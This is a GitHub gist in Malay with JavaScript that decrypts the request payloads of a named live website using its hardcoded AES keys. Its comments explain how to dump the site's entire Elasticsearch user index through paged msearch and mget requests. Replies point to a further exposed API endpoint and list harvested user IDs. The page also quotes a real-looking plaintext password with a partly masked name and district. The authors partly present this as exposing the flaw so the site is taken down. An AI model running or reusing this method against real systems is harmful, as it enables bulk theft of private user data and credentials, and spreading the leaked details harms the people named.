-
-
Save RamadhanAmizudin/67d0a279b647add5e0a7e31e88cf3477 to your computer and use it in GitHub Desktop.
// Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa | |
const crypto = require('crypto'); | |
const print = console.log | |
function getTimestamp(data) { | |
let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5"); | |
let iv = crypto.pbkdf2Sync('po9','misirakyat', 7, 16, "md5"); | |
let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv); | |
let decrypted = Buffer.concat([ | |
decrypter.update(data, 'base64'), | |
decrypter.final() | |
]).toString('utf8'); | |
return decrypted.split('_')[0] | |
} | |
function getRandomInt(data) { | |
let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5"); | |
let iv = crypto.pbkdf2Sync('fl1','misirakyat', 7, 16, "md5"); | |
let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv); | |
let decrypted = Buffer.concat([ | |
decrypter.update(data, 'base64'), | |
decrypter.final() | |
]).toString('utf8'); | |
return decrypted.split('_')[0] | |
} | |
function decryptRequest(input) { | |
let data = JSON.parse(input) | |
let key = crypto.pbkdf2Sync('misirakyat' + getTimestamp(data['y']),'misirakyat', 7, 32, "md5"); | |
let iv = crypto.pbkdf2Sync(getRandomInt(data['x']),'misirakyat', 7, 16, "md5"); | |
let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv); | |
dec = decrypter.update(data['z'], 'base64'), | |
dec += decrypter.final() | |
return dec | |
} | |
function encryptRequest(z, y, x) { | |
// :) | |
} | |
// msearch request | |
print(decryptRequest('{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}')) | |
// mget request | |
print(decryptRequest('{"z":"io58PiyPruXYV4KoQm+mI2xj9fYQyAcblVYcM711Di1jZlg4+Yy9UxvBQT8ix9YOhSZR8NnLxLUgDFF99cTtAJm1o7V9wRqNYqwFAQRwN8ZoUf/Olmqk3DM7BQybq2qeK4qyYrbqdOzJ5urIzkkviulz5kkGAGcMlL94OL9eW6gdlXCcVofvy68U8xYZjOY8Z+AORigoUnhAbEbX3iBZUvMC/OnvatHO2UAszbSm7zNdvrtCGe8QwOCYKTEbdWD6a+hT6fxmSmn7DR+6qtndQdiX8wcfe76cW1fRc8B6IqA927ctSLmtxQtUOOW0tC4SR6lClgyi088zm3ytZP1SWfgZPzne+n7lQ+qkGOag7Vrvd0gYUBDmOCvpSKUz54nBtR0/Fo0dEwUhtwSufXBM4B2KajQovF4URjm2hssORsQiV0uH7HgOX1xAGp0AkD/Os3eDfgrHycM5ep1/LRbjyps5CX5dnEdYwWH7XHtOZrOiPeURpB7PZvuFN15sfo64g69zANxTu4bbhDNnh/iqGhhq38D/fRWRrhA2A9SVJWK7sqF16BoxAyxFfUqx8kJbdhs6ysTz7o08NiqdfwPEZYg1MBiLVa87fembsa16VOQQImqVnqOnYdFQepEP2kYLGqMb7WHtXEfGVs8OqbOja4WDD8CWylxAn/HAZPetD8RoOB8GaeU9CJjWcHXjcF5AvkwZodyB+BKQ9DmMa/DZuGknEren5UPdU7H35/9fnmIYo5blklCphlA6BNdBmRHmFKpI8p6Rcgax++qJm0z3gciTNNqYNPYKKze+jksYxCunCP3JGttOJCWNcB1Xz3lwA6d6SEQdVfg5epaJnfVNSaD18zhGvo71PhX7Z/VSL1Geyfb8RayMve1n/PvnywrrnCJYgwnf6baypK//hLyyi641mpNRowwKJKf07VdxhWjP61DriIM0Mzy4Hxrn4Dv4NVK5lGyouxSGUJC4ksvD5cjDBdPlGC/YbquWI3qgaBforFs4VKwF5a1cNfZuB2zv","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}')) | |
// macam mana nak dump semua data? | |
// | |
// logic: | |
// response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0] | |
// while response.at_end != false | |
// reponse = request misirakyat.com/elasticsearch/msearch [n=10000,start=++] | |
// | |
// kalau rajin boleh amik user data with password - spoiler: plain text :) | |
// response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]] | |
// Contoh response: | |
// _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication | |
// | |
// | |
// Yang benar | |
// rempah (@rempahrz) | |
// 2023 r0xnkekw |
bruv
detik misi
Seyes ar
Hai
Sekadar menjernihkan lagi keadaan.
Selain di path elasticsearch , terdapat juga bug di path /api/1.1/init :v
spoiler: di /api/1.1/init berkemungkinan ada function del/edit/add , tak abis explorer lagi.
rasanya dah boleh minta takedown itu website dgn segera.
Found July 3 , Monday 3:08 AM
Request
GET /api/1.1/init/data?location=https://misirakyat.com/id/[IDxUSER] HTTP/2
Response
HTTP/2 200 OK
Sample ID From POST /elasticsearch/mget decryptRequest :
1686299905339x728270735016460300
1686298137416x952557159621328900
1686293917307x607575989128790000
1686293713660x468629340819816450
1686290761908x365577381682872300
1686286090840x237803624837152770
1686274082703x894211607030661100
1686273400658x281540547747774460
1686272329825x870919821270450200
1686270222530x455445408465813500
1686266742757x754796990000267300
1686264643168x419961457589354500
Bubbleio problem?
bang, WP scanner tu bila nak update terbaru 👯♂️